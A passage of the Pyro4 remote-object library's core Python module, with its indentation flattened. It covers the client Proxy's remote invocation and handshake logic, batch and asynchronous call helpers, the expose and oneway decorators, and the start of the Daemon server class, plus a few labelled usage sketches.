self._pyroMaxRetries = config.MAX_RETRIES
self._pyroConnection = None
self._pyroSeq = 0
self._pyroRawWireResponse = False
self.__pyroConnLock = threading.RLock()
self.__async = False
def __copy__(self):
uriCopy = URI(self._pyroUri)
p = type(self)(uriCopy)
p._pyroOneway = set(self._pyroOneway)
p._pyroMethods = set(self._pyroMethods)
p._pyroAttrs = set(self._pyroAttrs)
p._pyroSerializer = self._pyroSerializer
p._pyroTimeout = self._pyroTimeout
p._pyroHandshake = self._pyroHandshake
p._pyroHmacKey = self._pyroHmacKey
p._pyroRawWireResponse = self._pyroRawWireResponse
p._pyroMaxRetries = self._pyroMaxRetries
p.__async = self.__async
return p
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self._pyroRelease()
def __eq__(self, other):
if other is self:
return True
return isinstance(other, Proxy) and other._pyroUri == self._pyroUri
def __ne__(self, other):
if other and isinstance(other, Proxy):
return other._pyroUri != self._pyroUri
return True
def __hash__(self):
return hash(self._pyroUri)
def __dir__(self):
result = dir(self.__class__) + list(self.__dict__.keys())
return sorted(set(result) | self._pyroMethods | self._pyroAttrs)
def _pyroRelease(self):
"""release the connection to the pyro daemon"""
with self.__pyroConnLock:
if self._pyroConnection is not None:
if self._pyroConnection.keep_open:
return
self._pyroConnection.close()
self._pyroConnection = None
log.debug("connection released")
def _pyroBind(self):
"""
Bind this proxy to the exact object from the uri. That means that the proxy's uri
will be updated with a direct PYRO uri, if it isn't one yet.
If the proxy is already bound, it will not bind again.
"""
return self.__pyroCreateConnection(True)
def __pyroGetTimeout(self):
return self.__pyroTimeout
def __pyroSetTimeout(self, timeout):
self.__pyroTimeout = timeout
if self._pyroConnection is not None:
self._pyroConnection.timeout = timeout
_pyroTimeout = property(__pyroGetTimeout, __pyroSetTimeout, doc="""
The timeout in seconds for calls on this proxy. Defaults to ``None``.
If the timeout expires before the remote method call returns,
Pyro will raise a :exc:`Pyro4.errors.TimeoutError`""")
def _pyroInvoke(self, methodname, vargs, kwargs, flags=0, objectId=None):
"""perform the remote method call communication"""
current_context.response_annotations = {}
with self.__pyroConnLock:
if self._pyroConnection is None:
self.__pyroCreateConnection()
serializer = util.get_serializer(self._pyroSerializer or config.SERIALIZER)
objectId = objectId or self._pyroConnection.objectId
annotations = self.__annotations()
if vargs and isinstance(vargs[0], SerializedBlob):
# special serialization of a 'blob' that stays serialized
data, compressed, flags = self.__serializeBlobArgs(vargs, kwargs, annotations, flags, objectId, methodname, serializer)
else:
# normal serialization of the remote call
data, compressed = serializer.serializeCall(objectId, methodname, vargs, kwargs, compress=config.COMPRESSION)
if compressed:
flags |= message.FLAGS_COMPRESSED
if methodname in self._pyroOneway:
flags |= message.FLAGS_ONEWAY
self._pyroSeq = (self._pyroSeq + 1) & 0xffff
msg = message.Message(message.MSG_INVOKE, data, serializer.serializer_id, flags, self._pyroSeq,
annotations=annotations, hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy wiredata sending", msg)
try:
self._pyroConnection.send(msg.to_bytes())
del msg # invite GC to collect the object, don't wait for out-of-scope
if flags & message.FLAGS_ONEWAY:
return None # oneway call, no response data
else:
msg = message.Message.recv(self._pyroConnection, [message.MSG_RESULT], hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy wiredata received", msg)
self.__pyroCheckSequence(msg.seq)
if msg.serializer_id != serializer.serializer_id:
error = "invalid serializer in response: %d" % msg.serializer_id
log.error(error)
raise errors.SerializeError(error)
if msg.annotations:
current_context.response_annotations = msg.annotations
self._pyroResponseAnnotations(msg.annotations, msg.type)
if self._pyroRawWireResponse:
msg.decompress_if_needed()
return msg
data = serializer.deserializeData(msg.data, compressed=msg.flags & message.FLAGS_COMPRESSED)
if msg.flags & message.FLAGS_ITEMSTREAMRESULT:
streamId = bytes(msg.annotations.get("STRM", b"")).decode()
if not streamId:
raise errors.ProtocolError("result of call is an iterator, but the server is not configured to allow streaming")
return _StreamResultIterator(streamId, self)
if msg.flags & message.FLAGS_EXCEPTION:
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(data, False)
raise data # if you see this in your traceback, you should probably inspect the remote traceback as well
else:
return data
except (errors.CommunicationError, KeyboardInterrupt):
# Communication error during read. To avoid corrupt transfers, we close the connection.
# Otherwise we might receive the previous reply as a result of a new method call!
# Special case for keyboardinterrupt: people pressing ^C to abort the client
# may be catching the keyboardinterrupt in their code. We should probably be on the
# safe side and release the proxy connection in this case too, because they might
# be reusing the proxy object after catching the exception...
self._pyroRelease()
raise
def __pyroCheckSequence(self, seq):
if seq != self._pyroSeq:
err = "invoke: reply sequence out of sync, got %d expected %d" % (seq, self._pyroSeq)
log.error(err)
raise errors.ProtocolError(err)
def __pyroCreateConnection(self, replaceUri=False, connected_socket=None):
"""
Connects this proxy to the remote Pyro daemon. Does connection handshake.
Returns true if a new connection was made, false if an existing one was already present.
"""
def connect_and_handshake(conn):
try:
if self._pyroConnection is not None:
return False # already connected
if config.SSL:
sslContext = socketutil.getSSLcontext(clientcert=config.SSL_CLIENTCERT,
clientkey=config.SSL_CLIENTKEY,
keypassword=config.SSL_CLIENTKEYPASSWD,
cacerts=config.SSL_CACERTS)
else:
sslContext = None
sock = socketutil.createSocket(connect=connect_location,
reuseaddr=config.SOCK_REUSE,
timeout=self.__pyroTimeout,
nodelay=config.SOCK_NODELAY,
sslContext=sslContext)
conn = socketutil.SocketConnection(sock, uri.object)
# Do handshake.
serializer = util.get_serializer(self._pyroSerializer or config.SERIALIZER)
data = {"handshake": self._pyroHandshake}
if config.METADATA:
# the object id is only used/needed when piggybacking the metadata on the connection response
# make sure to pass the resolved object id instead of the logical id
data["object"] = uri.object
flags = message.FLAGS_META_ON_CONNECT
else:
flags = 0
data, compressed = serializer.serializeData(data, config.COMPRESSION)
if compressed:
flags |= message.FLAGS_COMPRESSED
msg = message.Message(message.MSG_CONNECT, data, serializer.serializer_id, flags, self._pyroSeq,
annotations=self.__annotations(False), hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy connect sending", msg)
conn.send(msg.to_bytes())
msg = message.Message.recv(conn, [message.MSG_CONNECTOK, message.MSG_CONNECTFAIL], hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy connect response received", msg)
except Exception as x:
if conn:
conn.close()
err = "cannot connect to %s: %s" % (connect_location, x)
log.error(err)
if isinstance(x, errors.CommunicationError):
raise
else:
ce = errors.CommunicationError(err)
if sys.version_info >= (3, 0):
ce.__cause__ = x
raise ce
else:
handshake_response = "?"
if msg.data:
serializer = util.get_serializer_by_id(msg.serializer_id)
handshake_response = serializer.deserializeData(msg.data, compressed=msg.flags & message.FLAGS_COMPRESSED)
if msg.type == message.MSG_CONNECTFAIL:
if sys.version_info < (3, 0):
error = "connection to %s rejected: %s" % (connect_location, handshake_response.decode())
else:
error = "connection to %s rejected: %s" % (connect_location, handshake_response)
conn.close()
log.error(error)
raise errors.CommunicationError(error)
elif msg.type == message.MSG_CONNECTOK:
if msg.flags & message.FLAGS_META_ON_CONNECT:
self.__processMetadata(handshake_response["meta"])
handshake_response = handshake_response["handshake"]
self._pyroConnection = conn
if replaceUri:
self._pyroUri = uri
self._pyroValidateHandshake(handshake_response)
log.debug("connected to %s - %s - %s", self._pyroUri, conn.family(), "SSL" if sslContext else "unencrypted")
if msg.annotations:
self._pyroResponseAnnotations(msg.annotations, msg.type)
else:
conn.close()
err = "cannot connect to %s: invalid msg type %d received" % (connect_location, msg.type)
log.error(err)
raise errors.ProtocolError(err)
with self.__pyroConnLock:
if self._pyroConnection is not None:
return False # already connected
if connected_socket:
if config.SSL and not isinstance(connected_socket, ssl.SSLSocket):
raise socket.error("SSL configured for Pyro but existing socket is not a SSL socket")
uri = self._pyroUri
else:
uri = _resolve(self._pyroUri, self._pyroHmacKey)
# socket connection (normal or Unix domain socket)
conn = None
log.debug("connecting to %s", uri)
connect_location = uri.sockname or (uri.host, uri.port)
if connected_socket:
self._pyroConnection = socketutil.SocketConnection(connected_socket, uri.object, True)
else:
connect_and_handshake(conn)
if config.METADATA:
# obtain metadata if this feature is enabled, and the metadata is not known yet
if self._pyroMethods or self._pyroAttrs:
log.debug("reusing existing metadata")
else:
self._pyroGetMetadata(uri.object)
return True
def _pyroGetMetadata(self, objectId=None, known_metadata=None):
"""
Get metadata from server (methods, attrs, oneway, ...) and remember them in some attributes of the proxy.
Usually this will already be known due to the default behavior of the connect handshake, where the
connect response also includes the metadata.
"""
objectId = objectId or self._pyroUri.object
log.debug("getting metadata for object %s", objectId)
if self._pyroConnection is None and not known_metadata:
try:
self.__pyroCreateConnection()
except errors.PyroError:
log.error("problem getting metadata: cannot connect")
raise
if self._pyroMethods or self._pyroAttrs:
return # metadata has already been retrieved as part of creating the connection
try:
# invoke the get_metadata method on the daemon
result = known_metadata or self._pyroInvoke("get_metadata", [objectId], {}, objectId=constants.DAEMON_NAME)
self.__processMetadata(result)
except errors.PyroError:
log.exception("problem getting metadata")
raise
def __processMetadata(self, metadata):
if not metadata:
return
self._pyroOneway = set(metadata["oneway"])
self._pyroMethods = set(metadata["methods"])
self._pyroAttrs = set(metadata["attrs"])
if log.isEnabledFor(logging.DEBUG):
log.debug("from meta: methods=%s, oneway methods=%s, attributes=%s",
sorted(self._pyroMethods), sorted(self._pyroOneway), sorted(self._pyroAttrs))
if not self._pyroMethods and not self._pyroAttrs:
raise errors.PyroError("remote object doesn't expose any methods or attributes. Did you forget setting @expose on them?")
def _pyroReconnect(self, tries=100000000):
"""
(Re)connect the proxy to the daemon containing the pyro object which the proxy is for.
In contrast to the _pyroBind method, this one first releases the connection (if the proxy is still connected)
        and retries making a new connection until it succeeds or the given number of tries runs out.
"""
self._pyroRelease()
while tries:
try:
self.__pyroCreateConnection()
return
except errors.CommunicationError:
tries -= 1
if tries:
time.sleep(2)
msg = "failed to reconnect"
log.error(msg)
raise errors.ConnectionClosedError(msg)
def _pyroBatch(self):
"""returns a helper class that lets you create batched method calls on the proxy"""
return _BatchProxyAdapter(self)
def _pyroAsync(self, asynchronous=True):
"""turns the proxy into asynchronous mode so you can do asynchronous method calls,
or sets it back to normal sync mode if you set asynchronous=False.
This setting is strictly on a per-proxy basis (unless an exact clone is made
via copy.copy)."""
self.__async = asynchronous
if sys.version_info < (3, 7):
# async keyword backwards compatibility
_pyroAsync_37 = _pyroAsync
def _pyroAsync(self, asynchronous=True, **kwargs):
if kwargs:
kword = list(kwargs.keys())
if kword != ["async"]:
raise TypeError("_pyroAsync() got an unexpected keyword argument '{:s}'".format(kword[0]))
asynchronous = kwargs["async"]
return Proxy._pyroAsync_37(self, asynchronous)
def _pyroInvokeBatch(self, calls, oneway=False):
flags = message.FLAGS_BATCH
if oneway:
flags |= message.FLAGS_ONEWAY
return self._pyroInvoke("<batch>", calls, None, flags)
def _pyroAnnotations(self):
"""
Override to return a dict with custom user annotations to be sent with each request message.
Code using Pyro 4.56 or newer can skip this and instead set the annotations directly on the context object.
"""
return {}
def _pyroResponseAnnotations(self, annotations, msgtype):
"""
Process any response annotations (dictionary set by the daemon).
Usually this contains the internal Pyro annotations such as hmac and correlation id,
and if you override the annotations method in the daemon, can contain your own annotations as well.
Code using Pyro 4.56 or newer can skip this and instead read the response_annotations directly from the context object.
"""
pass
def _pyroValidateHandshake(self, response):
"""
Process and validate the initial connection handshake response data received from the daemon.
Simply return without error if everything is ok.
Raise an exception if something is wrong and the connection should not be made.
"""
return
def __annotations(self, clear=True):
annotations = current_context.annotations
if current_context.correlation_id:
annotations["CORR"] = current_context.correlation_id.bytes
else:
annotations.pop("CORR", None)
annotations.update(self._pyroAnnotations())
if clear:
current_context.annotations = {}
return annotations
def __serializeBlobArgs(self, vargs, kwargs, annotations, flags, objectId, methodname, serializer):
"""
Special handling of a "blob" argument that has to stay serialized until explicitly deserialized in client code.
This makes efficient, transparent gateways or dispatchers and such possible:
they don't have to de/reserialize the message and are independent from the serialized class definitions.
Annotations are passed in because some blob metadata is added. They're not part of the blob itself.
"""
if len(vargs) > 1 or kwargs:
raise errors.SerializeError("if SerializedBlob is used, it must be the only argument")
blob = vargs[0]
flags |= message.FLAGS_KEEPSERIALIZED
# Pass the objectId and methodname separately in an annotation because currently,
# they are embedded inside the serialized message data. And we're not deserializing that,
# so we have to have another means of knowing the object and method it is meant for...
# A better solution is perhaps to split the actual remote method arguments from the
# control data (object + methodname) but that requires a major protocol change.
# The code below is not as nice but it works without any protocol change and doesn't
# require a hack either - so it's actually not bad like this.
import marshal
annotations["BLBI"] = marshal.dumps((blob.info, objectId, methodname))
if blob._contains_blob:
# directly pass through the already serialized msg data from within the blob
protocol_msg = blob._data
data, compressed = protocol_msg.data, protocol_msg.flags & message.FLAGS_COMPRESSED
else:
# replaces SerializedBlob argument with the data to be serialized
data, compressed = serializer.serializeCall(objectId, methodname, blob._data, kwargs, compress=config.COMPRESSION)
return data, compressed, flags
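# --- Illustrative sketch (not part of the original module) ---
# The hook methods above (_pyroAnnotations, _pyroResponseAnnotations,
# _pyroValidateHandshake) are meant to be overridden in a Proxy subclass.
# A minimal sketch of such a subclass follows; the "TRAC" annotation key and
# the example URI are assumptions made up purely for illustration.
def _example_custom_proxy():
    class TracingProxy(Proxy):
        def _pyroAnnotations(self):
            # send a custom 4-character annotation with every request message
            return {"TRAC": b"client-42"}

        def _pyroValidateHandshake(self, response):
            # the default daemon handshake response is "hello" (see Daemon.validateHandshake)
            if response != "hello":
                raise errors.SecurityError("unexpected handshake response")

    # hypothetical object URI; a matching daemon would have to be running
    with TracingProxy("PYRO:example.object@localhost:9090") as proxy:
        proxy._pyroBind()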
class _StreamResultIterator(object):
"""
Pyro returns this as a result of a remote call which returns an iterator or generator.
It is a normal iterable and produces elements on demand from the remote iterator.
You can simply use it in for loops, list comprehensions etc.
"""
def __init__(self, streamId, proxy):
self.streamId = streamId
self.proxy = proxy
self.pyroseq = proxy._pyroSeq
def __iter__(self):
return self
def next(self):
# python 2.x support
return self.__next__()
def __next__(self):
if self.proxy is None:
raise StopIteration
if self.proxy._pyroConnection is None:
raise errors.ConnectionClosedError("the proxy for this stream result has been closed")
self.pyroseq += 1
try:
return self.proxy._pyroInvoke("get_next_stream_item", [self.streamId], {}, objectId=constants.DAEMON_NAME)
except (StopIteration, GeneratorExit):
# when the iterator is exhausted, the proxy is removed to avoid unneeded close_stream calls later
# (the server has closed its part of the stream by itself already)
self.proxy = None
raise
def __del__(self):
self.close()
def close(self):
if self.proxy and self.proxy._pyroConnection is not None:
if self.pyroseq == self.proxy._pyroSeq:
# we're still in sync, it's okay to use the same proxy to close this stream
self.proxy._pyroInvoke("close_stream", [self.streamId], {},
flags=message.FLAGS_ONEWAY, objectId=constants.DAEMON_NAME)
else:
# The proxy's sequence number has diverged.
# One of the reasons this can happen is because this call is being done from python's GC where
# it decides to gc old iterator objects *during a new call on the proxy*.
# If we use the same proxy and do a call in between, the other call on the proxy will get an out of sync seq and crash!
# We create a temporary second proxy to call close_stream on. This is inefficient, but avoids the problem.
try:
with self.proxy.__copy__() as closingProxy:
closingProxy._pyroInvoke("close_stream", [self.streamId], {},
flags=message.FLAGS_ONEWAY, objectId=constants.DAEMON_NAME)
except errors.CommunicationError:
pass
self.proxy = None
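# --- Illustrative sketch (not part of the original module) ---
# A _StreamResultIterator is handed out transparently when a remote call
# returns an iterator or generator (item streaming). Client code simply
# iterates it; the URI and remote method name below are illustrative assumptions.
def _example_stream_consumption():
    with Proxy("PYRO:example.streamer@localhost:9090") as proxy:
        # every next() triggers a get_next_stream_item call on the daemon
        for item in proxy.produce_items():
            print(item)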
class _BatchedRemoteMethod(object):
"""method call abstraction that is used with batched calls"""
def __init__(self, calls, name):
self.__calls = calls
self.__name = name
def __getattr__(self, name):
return _BatchedRemoteMethod(self.__calls, "%s.%s" % (self.__name, name))
def __call__(self, *args, **kwargs):
self.__calls.append((self.__name, args, kwargs))
class _BatchProxyAdapter(object):
"""Helper class that lets you batch multiple method calls into one.
It is constructed with a reference to the normal proxy that will
carry out the batched calls. Call methods on this object that you want to batch,
and finally call the batch proxy itself. That call will return a generator
for the results of every method call in the batch (in sequence)."""
def __init__(self, proxy):
self.__proxy = proxy
self.__calls = []
def __getattr__(self, name):
return _BatchedRemoteMethod(self.__calls, name)
def __enter__(self):
return self
def __exit__(self, *args):
pass
def __copy__(self):
copy = type(self)(self.__proxy)
copy.__calls = list(self.__calls)
return copy
def __resultsgenerator(self, results):
for result in results:
if isinstance(result, futures._ExceptionWrapper):
result.raiseIt() # re-raise the remote exception locally.
else:
yield result # it is a regular result object, yield that and continue.
def __call__(self, oneway=False, asynchronous=False):
if oneway and asynchronous:
raise errors.PyroError("async oneway calls make no sense")
if asynchronous:
return _AsyncRemoteMethod(self, "<asyncbatch>", self.__proxy._pyroMaxRetries)()
else:
results = self.__proxy._pyroInvokeBatch(self.__calls, oneway)
self.__calls = [] # clear for re-use
if not oneway:
return self.__resultsgenerator(results)
if sys.version_info < (3, 7):
# async keyword backwards compatibility
call_37 = __call__
def __call__(self, oneway=False, **kwargs):
if kwargs:
kword = list(kwargs.keys())
if kword != ["async"] and kword != ["asynchronous"]:
raise TypeError("__call__() got an unexpected keyword argument '{:s}'".format(kword[0]))
if kword == ["async"]:
kwargs = {"asynchronous": kwargs["async"]}
kwargs["oneway"] = oneway
return _BatchProxyAdapter.call_37(self, **kwargs)
def _pyroInvoke(self, name, args, kwargs):
# ignore all parameters, we just need to execute the batch
results = self.__proxy._pyroInvokeBatch(self.__calls)
self.__calls = [] # clear for re-use
return self.__resultsgenerator(results)
class _AsyncRemoteMethod(object):
"""asynchronous method call abstraction (call will run in a background thread)"""
def __init__(self, proxy, name, max_retries):
self.__proxy = proxy
self.__name = name
self.__max_retries = max_retries
def __getattr__(self, name):
return _AsyncRemoteMethod(self.__proxy, "%s.%s" % (self.__name, name), self.__max_retries)
def __call__(self, *args, **kwargs):
result = futures.FutureResult()
thread = threading.Thread(target=self.__asynccall, args=(result, args, kwargs))
thread.setDaemon(True)
thread.start()
return result
def __asynccall(self, asyncresult, args, kwargs):
for attempt in range(self.__max_retries + 1):
try:
# use a copy of the proxy otherwise calls would still be done in sequence,
# and use contextmanager to close the proxy after we're done
with self.__proxy.__copy__() as proxy:
delay = 0.1 + random.random() / 5
while not proxy._pyroConnection:
try:
proxy._pyroBind()
except errors.CommunicationError as x:
if "no free workers" not in str(x):
raise
time.sleep(delay) # wait a bit until a worker might be available again
delay += 0.4 + random.random() / 2
if 0 < config.COMMTIMEOUT / 2 < delay:
raise
value = proxy._pyroInvoke(self.__name, args, kwargs)
asyncresult.value = value
return
except (errors.ConnectionClosedError, errors.TimeoutError) as x:
# only retry for recoverable network errors
if attempt >= self.__max_retries:
# ignore any exceptions here, return them as part of the asynchronous result instead
asyncresult.value = futures._ExceptionWrapper(x)
return
except Exception as x:
# ignore any exceptions here, return them as part of the asynchronous result instead
asyncresult.value = futures._ExceptionWrapper(x)
return
def batch(proxy):
"""convenience method to get a batch proxy adapter"""
return proxy._pyroBatch()
def asyncproxy(proxy, asynchronous=True):
"""convenience method to set proxy to asynchronous or sync mode."""
proxy._pyroAsync(asynchronous)
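# --- Illustrative sketch (not part of the original module) ---
# Typical client-side use of the two convenience helpers above. The proxy URI
# and the remote method names (add, multiply) are illustrative assumptions.
def _example_batch_and_async():
    with Proxy("PYRO:example.calc@localhost:9090") as proxy:
        # batched calls: queue them up, then send the whole batch in one round trip
        calc_batch = batch(proxy)
        calc_batch.add(2, 3)
        calc_batch.multiply(4, 5)
        for result in calc_batch():        # generator of results, in call order
            print(result)

        # asynchronous mode: calls return a FutureResult immediately
        asyncproxy(proxy)
        future = proxy.add(6, 7)
        print(future.value)                # blocks until the result is available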
def pyroObjectToAutoProxy(obj):
"""reduce function that automatically replaces Pyro objects by a Proxy"""
if config.AUTOPROXY:
daemon = getattr(obj, "_pyroDaemon", None)
if daemon:
# only return a proxy if the object is a registered pyro object
return daemon.proxyFor(obj)
return obj
# decorators
def callback(method):
"""
decorator to mark a method to be a 'callback'. This will make Pyro
raise any errors also on the callback side, and not only on the side
that does the callback call.
"""
method._pyroCallback = True
return method
def oneway(method):
"""
decorator to mark a method to be oneway (client won't wait for a response)
"""
method._pyroOneway = True
return method
def expose(method_or_class):
"""
Decorator to mark a method or class to be exposed for remote calls (relevant when REQUIRE_EXPOSE=True)
You can apply it to a method or a class as a whole.
If you need to change the default instance mode or instance creator, also use a @behavior decorator.
"""
if inspect.isdatadescriptor(method_or_class):
func = method_or_class.fget or method_or_class.fset or method_or_class.fdel
if util.is_private_attribute(func.__name__):
raise AttributeError("exposing private names (starting with _) is not allowed")
func._pyroExposed = True
return method_or_class
attrname = getattr(method_or_class, "__name__", None)
if not attrname:
# we could be dealing with a descriptor (classmethod/staticmethod), this means the order of the decorators is wrong
if inspect.ismethoddescriptor(method_or_class):
attrname = method_or_class.__get__(None, dict).__name__
raise AttributeError("using @expose on a classmethod/staticmethod must be done "
"after @classmethod/@staticmethod. Method: " + attrname)
else:
raise AttributeError("@expose cannot determine what this is: " + repr(method_or_class))
if util.is_private_attribute(attrname):
raise AttributeError("exposing private names (starting with _) is not allowed")
if inspect.isclass(method_or_class):
clazz = method_or_class
log.debug("exposing all members of %r", clazz)
for name in clazz.__dict__:
if util.is_private_attribute(name):
continue
thing = getattr(clazz, name)
if inspect.isfunction(thing) or inspect.ismethoddescriptor(thing):
thing._pyroExposed = True
elif inspect.ismethod(thing):
thing.__func__._pyroExposed = True
elif inspect.isdatadescriptor(thing):
if getattr(thing, "fset", None):
thing.fset._pyroExposed = True
if getattr(thing, "fget", None):
thing.fget._pyroExposed = True
if getattr(thing, "fdel", None):
thing.fdel._pyroExposed = True
clazz._pyroExposed = True
return clazz
method_or_class._pyroExposed = True
return method_or_class
def behavior(instance_mode="session", instance_creator=None):
"""
Decorator to specify the server behavior of your Pyro class.
"""
def _behavior(clazz):
if not inspect.isclass(clazz):
raise TypeError("behavior decorator can only be used on a class")
if instance_mode not in ("single", "session", "percall"):
raise ValueError("invalid instance mode: " + instance_mode)
if instance_creator and not callable(instance_creator):
raise TypeError("instance_creator must be a callable")
clazz._pyroInstancing = (instance_mode, instance_creator)
return clazz
if not isinstance(instance_mode, basestring):
raise SyntaxError("behavior decorator is missing argument(s)")
return _behavior
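# --- Illustrative sketch (not part of the original module) ---
# How the decorators above are typically combined on a server-side class.
# The class and its methods are illustrative assumptions, not part of Pyro itself.
def _example_exposed_class():
    @behavior(instance_mode="single")
    @expose
    class ExampleService(object):
        def greet(self, name):
            return "hello, " + name

        @oneway
        def log_event(self, text):
            # oneway: the client does not wait for this call to complete
            print("event:", text)

    return ExampleService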
@expose
class DaemonObject(object):
"""The part of the daemon that is exposed as a Pyro object."""
def __init__(self, daemon):
self.daemon = daemon
def registered(self):
"""returns a list of all object names registered in this daemon"""
return list(self.daemon.objectsById.keys())
def ping(self):
"""a simple do-nothing method for testing purposes"""
pass
def info(self):
"""return some descriptive information about the daemon"""
return "%s bound on %s, NAT %s, %d objects registered. Servertype: %s" % (
constants.DAEMON_NAME, self.daemon.locationStr, self.daemon.natLocationStr,
len(self.daemon.objectsById), self.daemon.transportServer)
def get_metadata(self, objectId, as_lists=False):
"""
Get metadata for the given object (exposed methods, oneways, attributes).
If you get an error in your proxy saying that 'DaemonObject' has no attribute 'get_metadata',
you're probably connecting to an older Pyro version (4.26 or earlier).
Either upgrade the Pyro version or set METADATA config item to False in your client code.
"""
obj = self.daemon.objectsById.get(objectId)
if obj is not None:
metadata = util.get_exposed_members(obj, only_exposed=config.REQUIRE_EXPOSE, as_lists=as_lists)
if config.REQUIRE_EXPOSE and not metadata["methods"] and not metadata["attrs"]:
# Something seems wrong: nothing is remotely exposed.
# Possibly because older code not using @expose is now running with a more recent Pyro version
# where @expose is mandatory in the default configuration. Give a hint to the user.
if not inspect.isclass(obj):
obj = type(obj)
warnings.warn("Class %r doesn't expose any methods or attributes. Did you forget setting @expose on them?" % obj)
return metadata
else:
log.debug("unknown object requested: %s", objectId)
raise errors.DaemonError("unknown object")
def get_next_stream_item(self, streamId):
if streamId not in self.daemon.streaming_responses:
raise errors.PyroError("item stream terminated")
client, timestamp, linger_timestamp, stream = self.daemon.streaming_responses[streamId]
if client is None:
# reset client connection association (can be None if proxy disconnected)
self.daemon.streaming_responses[streamId] = (current_context.client, timestamp, 0, stream)
try:
return next(stream)
except Exception:
# in case of error (or StopIteration!) the stream is removed
del self.daemon.streaming_responses[streamId]
raise
def close_stream(self, streamId):
if streamId in self.daemon.streaming_responses:
del self.daemon.streaming_responses[streamId]
class Daemon(object):
"""
Pyro daemon. Contains server side logic and dispatches incoming remote method calls
to the appropriate objects.
"""
def __init__(self, host=None, port=0, unixsocket=None, nathost=None, natport=None, interface=DaemonObject, connected_socket=None):
if connected_socket:
nathost = natport = None
else:
if host is None:
host = config.HOST
if nathost is None:
nathost = config.NATHOST
if natport is None and nathost is not None:
natport = config.NATPORT
if nathost and unixsocket:
raise ValueError("cannot use nathost together with unixsocket")
if (nathost is None) ^ (natport is None):
raise ValueError("must provide natport with nathost")
self.__mustshutdown = threading.Event()
self.__mustshutdown.set()
self.__loopstopped = threading.Event()
self.__loopstopped.set()
if connected_socket:
from Pyro4.socketserver.existingconnectionserver import SocketServer_ExistingConnection
self.transportServer = SocketServer_ExistingConnection()
self.transportServer.init(self, connected_socket)
else:
if config.SERVERTYPE == "thread":
from Pyro4.socketserver.threadpoolserver import SocketServer_Threadpool
self.transportServer = SocketServer_Threadpool()
elif config.SERVERTYPE == "multiplex":
from Pyro4.socketserver.multiplexserver import SocketServer_Multiplex
self.transportServer = SocketServer_Multiplex()
else:
raise errors.PyroError("invalid server type '%s'" % config.SERVERTYPE)
self.transportServer.init(self, host, port, unixsocket)
#: The location (str of the form ``host:portnumber``) on which the Daemon is listening
self.locationStr = self.transportServer.locationStr
log.debug("daemon created on %s - %s (pid %d)", self.locationStr, socketutil.family_str(self.transportServer.sock), os.getpid())
natport_for_loc = natport
if natport == 0:
# expose internal port number as NAT port as well. (don't use port because it could be 0 and will be chosen by the OS)
natport_for_loc = int(self.locationStr.split(":")[1])
#: The NAT-location (str of the form ``nathost:natportnumber``) on which the Daemon is exposed for use with NAT-routing
self.natLocationStr = "%s:%d" % (nathost, natport_for_loc) if nathost else None
if self.natLocationStr:
log.debug("NAT address is %s", self.natLocationStr)
pyroObject = interface(self)
pyroObject._pyroId = constants.DAEMON_NAME
#: Dictionary from Pyro object id to the actual Pyro object registered by this id
self.objectsById = {pyroObject._pyroId: pyroObject}
# assert that the configured serializers are available, and remember their ids:
self.__serializer_ids = {util.get_serializer(ser_name).serializer_id for ser_name in config.SERIALIZERS_ACCEPTED}
log.debug("accepted serializers: %s" % config.SERIALIZERS_ACCEPTED)
log.debug("pyro protocol version: %d pickle version: %d" % (constants.PROTOCOL_VERSION, config.PICKLE_PROTOCOL_VERSION))
self.__pyroHmacKey = None
self._pyroInstances = {} # pyro objects for instance_mode=single (singletons, just one per daemon)
self.streaming_responses = {} # stream_id -> (client, creation_timestamp, linger_timestamp, stream)
self.housekeeper_lock = threading.Lock()
self.create_single_instance_lock = threading.Lock()
self.__mustshutdown.clear()
@property
def _pyroHmacKey(self):
return self.__pyroHmacKey
@_pyroHmacKey.setter
def _pyroHmacKey(self, value):
# if needed, convert the hmac value to bytes first
if value and sys.version_info >= (3, 0) and type(value) is not bytes:
value = value.encode("utf-8") # convert to bytes
self.__pyroHmacKey = value
@property
def sock(self):
"""the server socket used by the daemon"""
return self.transportServer.sock
@property
def sockets(self):
"""list of all sockets used by the daemon (server socket and all active client sockets)"""
return self.transportServer.sockets
@property
def selector(self):
"""the multiplexing selector used, if using the multiplex server type"""
return self.transportServer.selector
@staticmethod
def serveSimple(objects, host=None, port=0, daemon=None, ns=True, verbose=True):
"""
Basic method to fire up a daemon (or supply one yourself).
objects is a dict containing objects to register as keys, and
their names (or None) as values. If ns is true they will be registered
in the naming server as well, otherwise they just stay local.
If you need to publish on a unix domain socket you can't use this shortcut method.
See the documentation on 'publishing objects' (in chapter: Servers) for more details.
"""
if daemon is None:
daemon = Daemon(host, port)
with daemon:
if ns:
ns = _locateNS()
for obj, name in objects.items():
if ns:
localname = None # name is used for the name server
else:
localname = name # no name server, use name in daemon
uri = daemon.register(obj, localname)
if verbose:
print("Object {0}:\n uri = {1}".format(repr(obj), uri))
if name and ns:
ns.register(name, uri)
if verbose:
print(" name = {0}".format(name))
if verbose:
print("Pyro daemon running.")
daemon.requestLoop()
def requestLoop(self, loopCondition=lambda: True):
"""
Goes in a loop to service incoming requests, until someone breaks this
or calls shutdown from another thread.
"""
self.__mustshutdown.clear()
log.info("daemon %s entering requestloop", self.locationStr)
try:
self.__loopstopped.clear()
condition = lambda: not self.__mustshutdown.isSet() and loopCondition()
self.transportServer.loop(loopCondition=condition)
finally:
self.__loopstopped.set()
log.debug("daemon exits requestloop")
def events(self, eventsockets):
"""for use in an external event loop: handle any requests that are pending for this daemon"""
return self.transportServer.events(eventsockets)
def shutdown(self):
"""Cleanly terminate a daemon that is running in the requestloop."""
log.debug("daemon shutting down")
self.streaming_responses = {}
time.sleep(0.02)
self.__mustshutdown.set()
if self.transportServer:
self.transportServer.shutdown()
time.sleep(0.02)
self.close()
self.__loopstopped.wait(timeout=5) # use timeout to avoid deadlock situations
@property
def _shutting_down(self):
return self.__mustshutdown.is_set()
def _handshake(self, conn, denied_reason=None):
"""
Perform connection handshake with new clients.
Client sends a MSG_CONNECT message with a serialized data payload.
If all is well, return with a CONNECT_OK message.
The reason we're not doing this with a MSG_INVOKE method call on the daemon
(like when retrieving the metadata) is because we need to force the clients
to get past an initial connect handshake before letting them invoke any method.
